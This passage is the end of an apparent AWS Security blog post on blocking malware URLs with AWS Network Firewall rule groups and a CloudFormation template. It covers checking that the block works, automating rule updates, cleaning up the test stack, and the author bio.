Your Network Firewall is now configured to block malware URLs that are defined in the rulegroup SampleStatefulRulegroupName.

As in the example above where we confirmed vulnerability, Figure 8 shows how to validate that the solution is now protecting your users from accessing malware sites.

Figure 8 shows a user trying to access the same insecure URLs we tested earlier and shows that the URLs are now blocked and the attempted connection times out.

Note: Since these URLs contain malware files, we do not recommend users perform this test, but are providing a screenshot as a demonstration. If you wish to actually test ability to download files, use URLs you know are safe for testing.

Figure 8. Insecure URL access blocked

Figure 8. Insecure URL access blocked

Validating blocking access helps your security team ensure that users or applications on your network cannot download malware. You can add similar rules for any URLs you identify as insecure. SOC operators are typically not familiar with updating CloudFormation templates, but you can use a deployment pipeline where the data required for the rule is stored in Amazon DynamoDB and use AWS Lambda functions to automate updating rules.

Now that you have an example running, you should implement a complete rule set that meets your requirement from a publicly available malware list such as CISSECURITY MALWARE LIST.

Cleanup

AWS resources created for testing can result in additional costs. Since this environment used a CloudFormation template, you can remove all AWS resources associated with the solution by deleting the CloudFormation stack you named previously (for example, nfw-stack).

Conclusion

This blog describes an approach for preventing users from downloading malware. The solution presented uses AWS Network Firewall to secure your environment by blocking access to the specified malware URLs. The supplied CloudFormation template can be used to automate this protection, and to easily set up a test environment to simulate the scenario.

For additional best practice information, see:

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

.

Want more AWS Security news? Follow us on Twitter.

Author

Ajit Puthiyavettle

Ajit is a Solution Architect working with enterprise clients, architecting solutions to achieve business outcomes. He is passionate about solving customer challenges with innovative solutions. His experience is with leading DevOps and security teams for enterprise and SaaS (Software as a Service) companies.

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close